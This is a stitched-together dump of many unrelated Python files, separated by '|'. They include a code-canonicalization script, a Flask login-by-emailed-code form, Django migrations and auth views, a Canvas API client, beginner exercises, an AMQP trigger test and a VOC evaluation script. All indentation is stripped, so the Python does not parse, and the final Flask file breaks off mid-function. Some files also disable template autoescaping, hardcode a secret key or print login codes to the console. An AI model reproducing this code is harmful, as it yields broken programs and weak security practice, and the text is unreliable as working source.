# looks like codegen is bugggy !! hence the patchwork
try:
# can we parse and unparse the code ??
ast.parse(codegen.to_source(ast.fix_missing_locations(root)))
code = codegen.to_source(ast.fix_missing_locations(root))
# code gen does a pretty bad job at generating code :@
# it generated - raiseFUNC('STR' % ANY)
# while it should be, raise FUNC('STR' % ANY)
# make a space in code when such things happen
for t in TYPES.values():
code = re.sub(r'([a-zA-Z]+)' + t, r'\1' + " " + t, code)
# check if we can parse it
ast.parse(codegen.to_source(ast.fix_missing_locations(root)))
return code
except:
return ""
def batch_deep_phrases(queries):
n = math.ceil(float(len(queries)) / 18.0)
n = int(n)
parts = [ queries[x * n : (x + 1) * n] for x in range(18) ]
# remove empty parts
parts = filter(lambda part: part != [], parts)
# sum of part lengths
pl_sum = 0
for part in parts:
pl_sum = pl_sum + len(part)
assert (len(queries) == pl_sum)
# Do parsing for every batch
qparser = QueryParser()
result = []
for part in parts:
print "Parsing queries ", parts.index(part) * n, " Onwards - ", len(queries)
result = result + qparser.deep_phrases(part)
assert (len(result) == len(queries))
return result
def tag_pos(queries):
phrase_pos = batch_deep_phrases(queries)
assert (len(phrase_pos) == len(queries))
# get pos alone
tok_pos = map(lambda ppos: ppos[1], phrase_pos)
return tok_pos
# unnormalize numbers
def unnormalize_numbers(reftypes_queries):
ref_types = []
for ref_type, query in reftypes_queries:
for k, v in ref_type[1].iteritems():
if v not in query and v.startswith(TYPES["num"]):
ref_type[1][k] = k
ref_types.append(ref_type)
assert (len(ref_types) == len(reftypes_queries))
return ref_types
def canonicalize_bunch(queries, codes):
assert (len(queries) == len(codes))
# assign ids to queries, codes for tracking
id_queries_codes = [ (i, queries[i], codes[i]) for i in range(len(queries)) ]
# get all ref types
ref_types = map(lambda d: (d[0], guess_types(d[2], d[1])), id_queries_codes)
# Canonicalizeing all queries; direct mapping part 1
id_queries_codes = map(lambda ref_type, d: (d[0], \
canonicalize_query_part1(d[1], ref_type[1]),\
d[2]), ref_types, id_queries_codes)
# batch process all queries for pos after canonicalization part 1
canon_p1_queries = map(lambda d: d[1], id_queries_codes)
id_qpos = tag_pos(canon_p1_queries)
# update id_queries_codes
id_queries_codes = map(lambda qpos, d: (d[0], qpos, d[2]), id_qpos, id_queries_codes)
# Canonicalize all queries; pos_info part 2
id_queries_codes = map(lambda ref_type, d: (d[0], \
canonicalize_query_part2(d[1], ref_type[1]), \
d[2]), ref_types, id_queries_codes)
# change in reftypes; ugly;
canon_p2_queries = map(lambda d: d[1], id_queries_codes)
assert (len(canon_p2_queries) == len(ref_types))
# if something is a number and does not appear in the query; leave it alone
ref_types = unnormalize_numbers(zip(ref_types, canon_p2_queries))
# finally canonicalize code
id_queries_codes = map(lambda ref_type, d: (d[0], d[1], canonicalize_code(d[2], ref_type[1])), \
ref_types, id_queries_codes)
# get canonicalized queries
canon_queries = map(lambda d: d[1], id_queries_codes)
canon_codes = map(lambda d: d[2], id_queries_codes)
ref_types = map(lambda rt: rt[1], ref_types)
return ref_types, canon_queries, canon_codes
## Main ########################################################################
if __name__ == '__main__':
queries, codes = fetch_queries_codes(ANNOT, CODE)
queries_codes = zip(queries, codes)
queries_codes = map(lambda q_c: (q_c[0], parsable_code(q_c[1])), queries_codes)
queries_codes = map(lambda q_c: (q_c[0], reproducable_code(q_c[1])), queries_codes)
queries_codes = map(lambda q_c: (q_c[0], parsable_code(q_c[1])), queries_codes)
queries_codes = filter(lambda q_c: q_c[1] != "", queries_codes)
queries, codes = zip(*queries_codes)
#give_me_5(queries, "queries")
#give_me_5(codes, "codes")
# have only 5
queries = queries[4:5]
codes = codes[4:5]
assert (len(queries) == len(codes))
ref_types, canon_queries, canon_codes = canonicalize_bunch(queries, codes)
assert (len(queries) == len(codes))
n = len(queries)
for idx in range(0, n):
q = queries[idx]
c = codes[idx]
cq = canon_queries[idx]
cc = canon_codes[idx]
print "-" * 60
print "\n"
print "index - ", idx
print "\n"
print "QUERY - "
print "\n"
print q
print "\n"
print cq
print "\n"
print "CODE - "
print "\n"
print c
print "\n"
print cc
print "\n"
x = raw_input()
|
from datetime import datetime, timedelta
from faker import Faker
from flask_wtf import FlaskForm
from flask import session
import wtforms as forms
from db import mongo
from schemas import UserSchema
class EmailForm(FlaskForm):
email = forms.StringField('Email Address')
def validate_email(form, field):
email_validator = forms.validators.Email(
message='That\'s not a valid email address.'
)
email_validator(form, field)
found_user = mongo.db.users.find_one({'email': field.data})
if not found_user:
raise forms.ValidationError(
f'User with email {field.data} not found'
)
session['user_json'] = UserSchema().dumps(found_user)
def send_enter_code(self):
fake = Faker()
enter_code = fake.numerify('######')
print(f'\nenter_code: {enter_code}\n')
session['enter_code'] = enter_code
session['enter_code_ttl'] = datetime.now() + timedelta(minutes=10)
session['enter_code_block_expired_at'] = (
datetime.now() + timedelta(minutes=1)
)
class LogInByCodeForm(FlaskForm):
enter_code = forms.StringField('Enter Code')
def validate_enter_code(form, field):
if datetime.now() > session['enter_code_ttl']:
raise forms.ValidationError('Enter code is stale')
if field.data != session['enter_code']:
raise forms.ValidationError('Wrong enter code')
def clean_session_data(self):
del session['enter_code']
del session['enter_code_ttl']
del session['enter_code_block_expired_at']
|
# Generated by Django 3.2.5 on 2021-07-18 22:25
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('events', '0005_alter_presence_unique_together'),
]
operations = [
migrations.RenameField(
model_name='presence',
old_name='is_insterested',
new_name='is_interested',
),
]
|
from flask import session
import requests
BASE_PARAMS = {'per_page': '50'}
CANVAS_DOMAIN = "usu.instructure.com"
def courses(token, id='15', more_pages_URI=None, term=None, deleted=None):
# parameters should be entered as type str
rh = {"Authorization": "Bearer %s" % token}
BASE_PARAMS = {'per_page': '50'}
per_page = int(BASE_PARAMS['per_page'])
# If term is used as a parameter, add it to parameters
if term:
BASE_PARAMS['enrollment_term_id'] = term
# If the user only wants to see deleted pages, add to parameters
if deleted:
BASE_PARAMS['state[]'] = 'deleted'
else:
BASE_PARAMS['state[]'] = 'all'
if more_pages_URI:
URI = more_pages_URI
data = requests.get(URI, headers=rh)
else:
endpoint = '/api/v1/accounts/%s/courses'
BASE_PARAMS['include[]'] = ['teachers', 'total_students', 'term', 'syllabus_body']
BASE_DOMAIN = "https://%s" % CANVAS_DOMAIN
URI = BASE_DOMAIN + (endpoint % id)
data = requests.get(URI, headers=rh, params=BASE_PARAMS)
json_data = data.json()
if 'prev' in data.links.keys():
session['PREVIOUS_PAGE'] = data.links['prev']['url']
first = False
else:
first = True
# If we the number of courses we get is less than the number that we want, this
# page is the last page.
desiredItems = int(BASE_PARAMS['per_page'])
if len(json_data) >= desiredItems:
if 'next' in data.links:
session['NEXT_PAGE'] = data.links['next']['url']
last = False
else:
last = True
else:
last = True
if more_pages_URI or first or last:
return json_data, more_pages_URI, first, last, per_page
else:
if 'errors' in json_data:
return json_data['errors'][0]['message'], more_pages_URI, first, last, per_page
else:
return json_data
def subaccounts(token, id='15', optional_base_params=None):
# arguments should be entered as type str
if optional_base_params:
BASE_PARAMS = optional_base_params
else:
pass
endpoint = '/api/v1/accounts/%s/sub_accounts'
rh = {"Authorization": "Bearer %s" % token}
BASE_DOMAIN = "https://%s" % CANVAS_DOMAIN
URI = BASE_DOMAIN + (endpoint % id)
data = requests.get(URI, headers=rh, params=BASE_PARAMS).json()
if 'errors' in data:
return data['errors'][0]['message']
else:
return data
def test_status(token, id='15'):
from flask import redirect, url_for
endpoint = '/api/v1/accounts/%s/scopes'
rh = {"Authorization": "Bearer %s" % token}
BASE_DOMAIN = "https://%s" % CANVAS_DOMAIN
endpoint_complete = endpoint % id
URI = BASE_DOMAIN + endpoint_complete
data = requests.get(URI, headers=rh, params=BASE_PARAMS)
# Test to get results of test
if data.status_code == 400:
return redirect(url_for('bad_request'))
elif data.status_code == 401:
return redirect(url_for('unauthorized'))
elif data.status_code == 404:
return redirect(url_for('not_found'))
elif data.status_code == 200:
return redirect(url_for('courses'))
else:
return 'Unknown error occurred. <br> Please contact USU Center for Student Analytics at https://ais.usu.edu/analytics/'
def course_enrollments(token, id):
endpoint = '/api/v1/courses/%s/enrollments'
rh = {"Authorization": "Bearer %s" % token}
BASE_DOMAIN = "https://%s" % CANVAS_DOMAIN
endpoint_complete = endpoint % id
URI = BASE_DOMAIN + endpoint_complete
data = requests.get(URI, headers=rh, params=BASE_PARAMS).json()
if 'errors' in data:
return data['errors'][0]['message']
else:
return data
# def students_enrolled_in_course(token, id):
# endpoint = '/api/v1/courses/%s/students'
# rh = {"Authorization": "Bearer %s" % token}
# BASE_DOMAIN = "https://%s" % CANVAS_DOMAIN
# endpoint_complete = endpoint % id
# URI = BASE_DOMAIN + endpoint_complete
# data = requests.get(URI, headers=rh, params=BASE_PARAMS).json()
# if 'errors' in data:
# return data['errors'][0]['message']
# else:
# return data
def enrollment_terms(token):
id = 15
endpoint = '/api/v1/accounts/%s/terms'
rh = {"Authorization": "Bearer %s" % token}
BASE_DOMAIN = "https://%s" % CANVAS_DOMAIN
endpoint_complete = endpoint % id
URI = BASE_DOMAIN + endpoint_complete
data = requests.get(URI, headers=rh, params=BASE_PARAMS).json()
if 'errors' in data:
return data['errors'][0]['message']
else:
return data
def get_assignments(token, id):
BASE_PARAMS['per_page'] = '100' # Make loop through
endpoint = '/api/v1/courses/%s/assignments'
rh = {"Authorization": "Bearer %s" % token}
BASE_DOMAIN = "https://%s" % CANVAS_DOMAIN
endpoint_complete = endpoint % id
URI = BASE_DOMAIN + endpoint_complete
data = requests.get(URI, headers=rh, params=BASE_PARAMS).json()
if 'errors' in data:
return data['errors'][0]['message']
else:
return data
|
import requests
r = requests.post("http://0.0.0.0:5000/", json={'ID':'10200','FPS':'2','duration':'40','lang':'hindi'})
print(r.status_code, r.reason)
print(r.text)
# from urllib.parse import urlencode
# from urllib.request import Request, urlopen
# url = 'http://0.0.0.0:5000/' # Set destination URL here
# post_fields = {'ID': '12345'} # Set POST fields here
# request = Request(url, urlencode(post_fields).encode())
# json = urlopen(request).read().decode()
# print(json)
# Include fps and duration on req
|
from django.shortcuts import render,redirect,get_object_or_404
from django.http import HttpResponse,JsonResponse, HttpResponse
from django.views.decorators.http import require_GET,require_POST,require_http_methods
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth import authenticate,login as auth_login, logout as auth_logout
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from .forms import LoginForm,ForgotPassword,SetPassword,SignupForm
from .models import MyUser,create_otp,get_valid_otp_object
from django.core.mail import EmailMultiAlternatives
from django.conf import settings
from django.template import loader
# Create your views here.
#@required_login set a get parameter next in the url
def hello(request):
print(request)
print(request.GET.get('abc',''))
return HttpResponse('<h1>Hello</h1>')
'''
@require_GET
def show_login(request):
if request.user.is_authenticated():
return redirect(reverse('home',kwargs={'id':user.id}));
return render(request,'account/auth/login.html');
'''
@require_http_methods(['GET','POST'])
def login(request):
if request.user.is_authenticated():
return redirect(reverse('home',kwargs={'id':request.user.id}));
if request.method=='GET':
context={'f':LoginForm()};
return render(request,'account/auth/login.html',context);
else:
f=LoginForm(request.POST);
if not f.is_valid():
return render(request,'account/auth/login.html',{'f':f});
else:
#user=MyUser.objects.get(username=f.cleaned_data.get('username'))
#user=authenticate(username=f.cleaned_data['username'],password=f.cleaned_data['password'])
#user.backend='django.contrib.auth.backends.ModelBackend'
#print(user.backend)
auth_login(request,f.authenticated_user);
return redirect(reverse('home',kwargs={'id':f.authenticated_user.id}));
def forgot_password(request):
if request.user.is_authenticated():
return redirect(reverse('home',kwargs={'id':request.user.id}));
if request.method=='GET':
context={'f':ForgotPassword()};
return render(request,'account/auth/forgot_password.html',context);
else:
f=ForgotPassword(request.POST)
if not f.is_valid():
return render(request,'account/auth/forgot_password.html',{'f':f});
else:
user=MyUser.objects.get(username=f.cleaned_data['username'])
otp=create_otp(user=user,purpose='FP')
#send email
email_body_context={'u':user,'otp':otp}
body=loader.render_to_string('account/auth/email/forgot_password.txt',email_body_context)
message=EmailMultiAlternatives("Reset Password",body,settings.EMAIL_HOST_USER,[user.email])
#message.attach_alternative(html_body,'text/html')
message.send()
return render(request,'account/auth/forgot_email_sent.html',{'u':user})
def reset_password(request,id=None,otp=None):
if request.user.is_authenticated():
return redirect(reverse('home',kwargs={'id':request.user.id}));
user=get_object_or_404(MyUser,id=id)
otp_object=get_valid_otp_object(user=user,purpose='FP',otp=otp)
if not otp_object:
raise Http404();
if request.method=='GET':
f=SetPassword()
context={'f':f,'otp':otp_object.otp,'uid':user.id}
return render(request,'account/auth/set_password.html',context)
else:
f=SetPassword(request.POST)
if f.is_valid():
user.set_password(f.cleaned_data['new_password'])
user.save()
otp_object.delete()
return render(request,'account/auth/set_password_success.html',{'u':user})
context={'f':f,'otp':otp_object.otp,'uid':user.id}
return render(request,'account/auth/set_password.html',context)
@require_GET
@login_required
def home(request,id):
#if not request.user.is_authenticated():
# return redirect(reverse('base'))
return render(request,'account/auth/loggedin.html')
def logout(request):
auth_logout(request)
return redirect(reverse('login'));
def signup(request):
if request.user.is_authenticated():
return redirect(reverse('home',kwargs={'id':request.user.id}));
if request.method=='GET':
context={'f':SignupForm()};
return render(request,'account/auth/signup.html',context);
else:
f=SignupForm(request.POST)
if not f.is_valid():
return render(request,'account/auth/signup.html',{'f':f});
else:
user=f.save(commit=False)
user.set_password(f.cleaned_data['password'])
user.is_active=False
user.save()
#user=MyUser.objects.get(username=f.cleaned_data['username'])
otp=create_otp(user=user,purpose='AA')
#send email
email_body_context={'u':user,'otp':otp}
body=loader.render_to_string('account/auth/email/activation_link.txt',email_body_context)
message=EmailMultiAlternatives("Activation Link",body,settings.EMAIL_HOST_USER,[user.email])
#message.attach_alternative(html_body,'text/html')
message.send()
return render(request,'account/auth/activation_link_sent.html',{'u':user})
''' Activate Account'''
@require_GET
def activate(request,id=None,otp=None):
user=get_object_or_404(MyUser,id=id)
otp_object=get_valid_otp_object(user=user,purpose='AA',otp=otp)
if not otp_object:
raise Http404();
user.is_active=True
user.save()
otp_object.delete()
return render(request,'account/auth/activation_successful.html',{'u':user})
|
import turtle as t
t.shape("turtle")
t.penup()
t.pendown()
t.forward(100)
t.left(60)
t.forward(100)
t.left(60)
t.forward(100)
t.left(60)
t.forward(100)
t.left(60)
t.forward(100)
t.left(60)
t.forward(100)
t.left(60)
t.done()
|
import os
def hello_world():
print("-------> CLAYTHON SAYS ------ HELLO")
pass
if __name__ == "__main__":
hello_world()
|
'''korean_dict_parser_type_1.py
Korean dictionary parser for type 1 text files
'''
import json
from word_functions import (
strip_and_sub_using_regex,
generate_korean_dictionary_type_1,
)
INPUT_FILE = "../txt/6000_p1.txt"
OUTPUT_FILE = "../json/korean_dict_6000_part_1.json"
def main():
# Read korean word file
print(f"Reading {INPUT_FILE}\n")
with open(INPUT_FILE, 'r') as file:
raw_content = file.readlines()
k_dict = generate_korean_dictionary_type_1(raw_content)
# Write to file
with open(OUTPUT_FILE, "w") as file:
json.dump(k_dict, file)
print(F'''
Completed writing to {OUTPUT_FILE}
Total words written to file: {len(k_dict)}
''')
if __name__ == '__main__':
main()
|
# Generated by Django 2.2 on 2019-10-28 01:13
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Location',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('street', models.CharField(max_length=200)),
('zip_code', models.CharField(max_length=200)),
('city', models.CharField(max_length=200)),
('state', models.CharField(max_length=200)),
('country', models.CharField(max_length=200)),
],
),
migrations.CreateModel(
name='Movie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tmdbID', models.CharField(max_length=200)),
('title', models.CharField(max_length=500)),
('year', models.CharField(max_length=4)),
('director', models.CharField(max_length=500)),
('producer', models.CharField(max_length=500)),
('runtime', models.CharField(max_length=10)),
('actors', models.CharField(max_length=500)),
('plot', models.TextField(max_length=2000)),
('country', models.CharField(max_length=500)),
('posterpath', models.CharField(max_length=100)),
('trailerlink', models.CharField(max_length=200)),
('on_netflix', models.BooleanField(default=False)),
('netflix_link', models.TextField(blank=True)),
('on_amazon', models.BooleanField(default=False)),
('amazon_link', models.TextField(blank=True)),
],
),
migrations.CreateModel(
name='MovieNightEvent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('motto', models.CharField(max_length=200)),
('description', models.TextField(max_length=10000)),
('date', models.DateTimeField(verbose_name='date published')),
('isdraft', models.BooleanField(default=True)),
('isdeactivated', models.BooleanField(default=False)),
('MaxAttendence', models.IntegerField(default=25)),
('MovieList', models.ManyToManyField(blank=True, to='userhandling.Movie')),
('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='userhandling.Location')),
],
),
migrations.CreateModel(
name='PasswordReset',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(blank=True, max_length=30)),
('created_at', models.DateTimeField(auto_now_add=True)),
('reset_key', models.CharField(blank=True, max_length=40)),
('reset_used', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Topping',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('topping', models.CharField(max_length=300)),
],
),
migrations.CreateModel(
name='UserAttendence',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('registered_at', models.DateTimeField(auto_now_add=True)),
('registration_complete', models.BooleanField(default=False)),
('movienight', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='userhandling.MovieNightEvent')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='VotingParameters',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('vote_disable_before', models.DurationField()),
('reminder_email_before', models.DurationField()),
('initial_email_after', models.DurationField()),
],
),
migrations.CreateModel(
name='VotePreference',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('preference', models.IntegerField(blank=True)),
('movie', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='userhandling.Movie')),
('user_attendence', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='userhandling.UserAttendence')),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bio', models.TextField(blank=True, max_length=500)),
('email_buffer', models.EmailField(default='', max_length=254)),
('location', models.CharField(blank=True, max_length=30)),
('birth_date', models.DateField(blank=True, null=True)),
('activation_key', models.CharField(blank=True, max_length=40)),
('key_expires', models.DateTimeField(blank=True, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='MovienightTopping',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('topping', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='userhandling.Topping')),
('user_attendence', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='userhandling.UserAttendence')),
],
),
]
|
#map- Function
def triple(x):
return 3*x
def triplesuffle(y):
nl = map(triple,y)
return list(nl)
v = [1,2,3]
z = triplesuffle(v)
print(z)
#map- Lambda
def five(value):
new_list = map(lambda u:5*u, value)
return list(new_list)
b = [8,9,10]
n = five(b)
print(n)
#Create a list
#That will contain the upper case only
abbrevs = ["usa", "esp", "chn", "jpn", "mex", "can", "rus", "rsa", "jam"]
l = map(lambda c: c.upper(),abbrevs)
abbrevs_upper = list(l)
print(abbrevs_upper)
#Create a list
#That will contain the upper case only
#But this time 1st 2 letters only
abbrevs = ["usa", "esp", "chn", "jpn", "mex", "can", "rus", "rsa", "jam"]
l = map(lambda c: c[:2].upper(),abbrevs)
abbrevs_upper = list(l)
print(abbrevs_upper)
#Same as before
#But using another function
abbrevs = ["usa", "esp", "chn", "jpn", "mex", "can", "rus", "rsa", "jam"]
def tnsfr(x):
return x.upper()
new = map(tnsfr,abbrevs)
y = list(new)
print(y)
|
"""
Solve the sudoko which is a 3*3 matrix, the sum of each row and each column and diagonal
of the matrix is 15. Function sudoko2 seems better for it only caculate the rows once.
"""
from itertools import permutations
def sudoko():
numbers = [1,2,3,4,5,6,7,8,9]
pmNumbers = permutations(numbers)
results = []
for pmNumber in pmNumbers:
matrix = [pmNumber[:3], pmNumber[3:6], pmNumber[6:]]
if all(sum(row)==15 for row in matrix) and all(sum(col)==15 for col in zip(*matrix)) \
and matrix[0][0]+matrix[1][1]+matrix[2][2]==matrix[0][2]+matrix[1][1]+matrix[2][0]==15:
results.append(matrix)
for result in results:
for row in result:
print(row)
print('*'*20)
def sudoko2():
numbers = [1,2,3,4,5,6,7,8,9]
pmNumbers = permutations(numbers, 3)
fifteens = [pmNumber for pmNumber in pmNumbers if sum(pmNumber)==15]
preResults = permutations(fifteens, 3)
results = []
for preResult in preResults:
if len(set(num for fifteen in preResult for num in fifteen)) == 9:
if all(sum(col)==15 for col in zip(*preResult)) \
and preResult[0][0]+preResult[1][1]+preResult[2][2]==preResult[0][2]+preResult[1][1]+preResult[2][0]==15:
results.append(preResult)
for result in results:
for row in result:
print(row)
print('*'*20)
# sudoko()
# sudoko2()
# The time sudoko takes is 3 times of which sudoko2 takes. |
# Generated by Django 3.1.7 on 2021-03-28 07:31
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('home', '0004_auto_20210328_1256'),
]
operations = [
migrations.AlterField(
model_name='comments',
name='date',
field=models.DateField(blank=True, default=datetime.datetime(2021, 3, 28, 7, 31, 29, 751307, tzinfo=utc), null=True),
),
migrations.AlterField(
model_name='feed',
name='date',
field=models.DateField(blank=True, default=datetime.datetime(2021, 3, 28, 7, 31, 29, 750311, tzinfo=utc), null=True),
),
]
|
# -*- coding: utf-8 -*-
# @Author :AI悦创
# @DateTime :2019/9/15 11:31
# @FileName :判断是否为整数插件.PY
# @Function :功能
# Development_tool :PyCharm
# <-------import data-------------->
# def isinstance_int(start_pn_num, end_pn_sum):
def isinstance_int(target):
# target = end_pn_sum/start_pn_num
if isinstance(target, int):
print('整数')
elif isinstance(target, float):
print('浮点数')
if __name__ == '__main__':
isinstance_int(30) |
# Copyright 2020 The KNIX Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import random
import sys
import time
import unittest
import socket
import os
import subprocess
sys.path.append("../")
from mfn_test_utils import MFNTest
print("Starting rabbitmq")
rabbit = subprocess.Popen(["scripts/run_local_rabbitmq.sh"])
time.sleep(20)
print("Starting publisher")
pub = subprocess.Popen(["scripts/run_local_publisher.sh"])
time.sleep(10)
os.system("scripts/run_local_subscriber.sh")
print("Publisher is ready")
class TriggersAmqpTest(unittest.TestCase):
# @unittest.skip("")
def test_triggers_storage(self):
test = MFNTest(test_name='triggers_amqp',
workflow_filename='wf_triggers_amqp.json')
time.sleep(5)
print("Executing test")
nonce = str(int(time.time() * 1000))
curr_hostname = socket.gethostname()
input_data = []
workflowname = "wf_triggers_amqp"
routingkey_to_expect = "rabbit.routing.key"
routingkey = "rabbit.*.*"
input_data.append(workflowname)
input_data.append(nonce)
input_data.append("amqp://rabbituser:rabbitpass@" + curr_hostname + ":5672/%2frabbitvhost")
input_data.append(routingkey)
input_data.append("egress_exchange")
response = test.execute(input_data)
time.sleep(2)
counter_state_1 = 0
counter_state_2 = 0
counter_state_1_error = 0
counter_state_2_error = 0
logs = test.get_workflow_logs()
wflog = logs["log"]
log_lines = wflog.split("\n")
for line in log_lines:
if "_!_TRIGGER_START_" + nonce + ";triggers_amqp;" + workflowname + ";" + routingkey_to_expect + ";" in line.strip():
counter_state_1 = counter_state_1 + 1
print(line.strip())
if "_!_TRIGGER_ERROR_" + nonce + ";triggers_amqp;" + workflowname + ";;" in line.strip():
counter_state_1_error = counter_state_1_error + 1
print(line.strip())
if "_!_TRIGGER_START_" + nonce + ";triggers_amqp_state2;" + workflowname + ";" + routingkey_to_expect + ";" in line.strip():
counter_state_2 = counter_state_2 + 1
print(line.strip())
if "_!_TRIGGER_ERROR_" + nonce + ";triggers_amqp_state2;" + workflowname + ";;" in line.strip():
counter_state_2_error = counter_state_2_error + 1
print(line.strip())
print("Force stopping AMQP broker and checking for error message propagation")
pub.terminate()
rabbit.terminate()
subprocess.Popen(["scripts/stop_local_rabbitmq.sh"])
time.sleep(20)
logs = test.get_workflow_logs()
wflog = logs["log"]
log_lines = wflog.split("\n")
for line in log_lines:
if "_!_TRIGGER_ERROR_" + nonce + ";triggers_amqp;" + workflowname + ";;" in line.strip():
counter_state_1_error = counter_state_1_error + 1
print(line.strip())
if "_!_TRIGGER_ERROR_" + nonce + ";triggers_amqp_state2;" + workflowname + ";;" in line.strip():
counter_state_2_error = counter_state_2_error + 1
print(line.strip())
if counter_state_1 >=2 and counter_state_2 >=4 and counter_state_1_error == 0 and counter_state_2_error == 1:
print("Number of state1 triggers: " + str(counter_state_1))
print("Number of state2 triggers: " + str(counter_state_2))
print("Number of state1 error triggers: " + str(counter_state_1_error))
print("Number of state1 error triggers: " + str(counter_state_2_error))
test.report(True, str(input_data), input_data, response)
else:
print("Number of state1 triggers: " + str(counter_state_1))
print("Number of state2 triggers: " + str(counter_state_2))
print("Number of state1 error triggers: " + str(counter_state_1_error))
print("Number of state1 error triggers: " + str(counter_state_2_error))
test.report(False, str(input_data), input_data, response)
for line in log_lines:
print(line.strip())
test.undeploy_workflow()
test.cleanup()
|
# -*- coding: utf-8 -*-
# @Time : 5/24/18 10:54 AM
# @Author : yunfan
# @File : voc_eval.py
import numpy as np
import json
import cPickle
from DetmAPinVOC import DetmAPinVOC
from gluoncv.data.pascal_voc.detection import VOCDetection
DEBUG = False
VOC_2007_JSON_PATH = './VOC2007-SSD-512.json'
def res_to_allbbox(voc_classes, path=VOC_2007_JSON_PATH):
with open(path, 'r') as f:
res = json.load(f)
detections = []
for i in range(len(voc_classes)):
detections.append([])
for j in range(4952):
detections[i].append([])
for res_id in res.keys():
val = res[res_id] # [{"loc":[xmin, ymin, xmax, ymax], "soc":0.8, "clsna":"car", "clsid":6},{}...]
im_ind = res_id[-10:-4] # 006907
im_id = pascalVOC.image_set_index.index(im_ind)
for bbox in val:
soc = bbox['soc']
clsna = bbox['clsna']
clsid = bbox['clsid']
loc = bbox['loc']
loc.append(float(soc))
cls_ind = voc_classes.index(clsna)
detections[cls_ind][im_id].append(loc)
for cls_ind in range(len(detections)):
rr = detections[cls_ind]
for im_ind in range(len(rr)):
detections[cls_ind][im_ind] = np.array(detections[cls_ind][im_ind])
return detections
def from_VOC_label():
voc_2007_test_set = VOCDetection(
root='/Users/yunfanlu/WorkPlace/MyData/VOCDevkit',
splits=((2007, 'test'),)
)
voc_2007_det_label = {}
for ind in range(len(voc_2007_test_set)):
image_ind = voc_2007_test_set._items[ind][1]
bbox_list = voc_2007_test_set[ind][1]
for bbox in bbox_list:
bbox_coord = bbox[:4].tolist()
class_id = int(bbox[4])
class_name = voc_2007_test_set.CLASSES[class_id]
class_new_id = pascalVOC.classes.index(class_name)
if class_new_id not in voc_2007_det_label.keys():
voc_2007_det_label[class_new_id] = {}
if image_ind not in voc_2007_det_label[class_new_id].keys():
voc_2007_det_label[class_new_id][image_ind] = []
bbox_coord.append(1.0)
voc_2007_det_label[class_new_id][image_ind].append(bbox_coord)
for i in voc_2007_det_label.keys():
for j in voc_2007_det_label[i].keys():
voc_2007_det_label[i][j] = np.array(voc_2007_det_label[i][j])
return voc_2007_det_label
def from_pkl_file():
file_path = '/Users/yunfanlu/GithubProject/12 Mask RCNN/EvaluationInPascalVOC/test/voc_2007_test_detections.pkl'
with open(file_path, 'rb') as f:
data = cPickle.load(f)
return data
if __name__ == '__main__':
pascalVOC = DetmAPinVOC(
image_set='2007_test',
devkit_path='/Users/yunfanlu/WorkPlace/MyData/VOCDevkit')
if DEBUG:
# detections = from_VOC_label()
detections = from_pkl_file()
else:
detections = res_to_allbbox(voc_classes=pascalVOC.classes)
pascalVOC.evaluate_detections(detections=detections)
|
from flask import Flask, session, request, jsonify, render_template
from flask.ext.cache import Cache
import os
import json
# SETUP ======================================================================================
app = Flask(__name__) #APPLICATION
app.config.from_object(__name__)
app.jinja_env.autoescape = False # this allows HTML tags to be read in from strings in the Gallery section
app.jinja_env.lstrip_blocks = True # strip the whitespace from jinja template lines
app.jinja_env.trim_blocks = True
app.secret_key = 'gh-projects' # decryption key for session variable
cache = Cache(app, config={'CACHE_TYPE': 'simple'}) # initialize cache to store objects
def getLocs(index): # page background scrolling using session variables
try:
session['fromLoc'] = session['toLoc'] # set previous location to old destination
session['toLoc'] = index
except KeyError: # first time this function is being called, no movement
session['toLoc'] = index
session['fromLoc'] = index
# print "%d to %d" % (session['fromLoc'], session['toLoc'])
locs = { # new dictionary with locations to pass to template
'from' : session['fromLoc'],
'to' : session['toLoc']
}
return locs
# ROUTES =====================================================================================
@app.route('/')
def landing_page():
fromTo = getLocs(0)
return render_template('home.html', locs=fromTo) #pass on location attributes
# MAIN PAGES ------------------------------------
@app.route('/about')
def about():
fromTo = getLocs(1)
extra_scripts = [ '/static/js/language_bar.js' ]
